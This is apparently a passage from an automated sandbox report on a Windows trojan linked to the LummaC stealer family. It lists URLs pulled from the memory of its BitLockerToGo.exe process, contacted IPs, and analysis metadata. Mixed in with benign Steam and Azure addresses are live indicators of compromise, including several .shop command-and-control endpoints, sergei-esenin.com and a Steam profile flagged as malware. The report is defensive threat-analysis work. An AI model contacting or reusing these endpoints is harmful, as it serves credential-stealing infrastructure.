                                                      https://www.google.comBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://locatedblsoqp.shop/apiBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovclSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                          		unknown
                                                          https://locatedblsoqp.shop/=zBitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmptrue
                                                            		unknown
                                                            https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netinsufficientSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://caffegclasiqwp.shop/piBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://s.ytimg.com;BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://steam.tv/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://steamcommunity.com/profiles/76561199724331900uBitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://microsoftgraph.chinacloudapi.cngoSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                        		unknown
                                                                        https://steamcommunity.com/mBitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://sergei-esenin.com/apiDQBitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://stagedchheiqwo.shop/apiBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                		unknown
                                                                                https://sergei-esenin.com/zBitLockerToGo.exe, 00000002.00000003.1646510389.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://sketchfab.comBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://caffegclasiqwp.shop/BBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://lv.queniujq.cnBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: malware
                                                                                      		unknown
                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://locatedblsoqp.shop/BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              		unknown
                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://www.google.com/recaptcha/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://checkout.steampowered.com/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://sergei-esenin.com/apirBitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://sergei-esenin.com/ZBitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://millyscroqwp.shop/apinBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://store.steampowered.com/;BitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettinSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                        		unknown
                                                                                                        https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://databSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                          		unknown
                                                                                                          https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://manage.windowsazure.us/publishsettings/indexConvertSecurityDescriptorToStringSecurityDescripSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                              		unknown
                                                                                                              https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://stamppreewntnq.shop/uxBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://store.steampowered.com/news/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://steambroadcast.akamaized.naCBitLockerToGo.exe, 00000002.00000002.1646797955.000000000061D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.cloudflare.com/learning/access-mBitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comRequestSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                                                          		unknown
                                                                                                                          http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://stamppreewntnq.shop/KxBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://locatedblsoqp.shop/apiBYBitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                		unknown
                                                                                                                                https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://sergei-esenin.com/apiUBitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://store.steampowered.com/stats/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://stamppreewntnq.shop/BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      104.21.53.8
                                                                                                                                      		sergei-esenin.comUnited States
                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                      188.114.96.3
                                                                                                                                      		nippydxmnwquo.shopEuropean Union
                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                      104.102.49.254
                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                      		16625AKAMAI-ASUStrue

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1532746
                                                                                                                                      Start date and time:2024-10-13 21:33:20 +02:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 4m 26s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:6
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.evad.winEXE@3/0@11/3
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 91%
                                                                                                                                      • Number of executed functions: 17
                                                                                                                                      • Number of non-executed functions: 95
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Stop behavior analysis, all processes terminated

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe, PID 6476 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • VT rate limit hit for: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      15:34:52API Interceptor5x Sleep call for process: BitLockerToGo.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      104.21.53.8file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
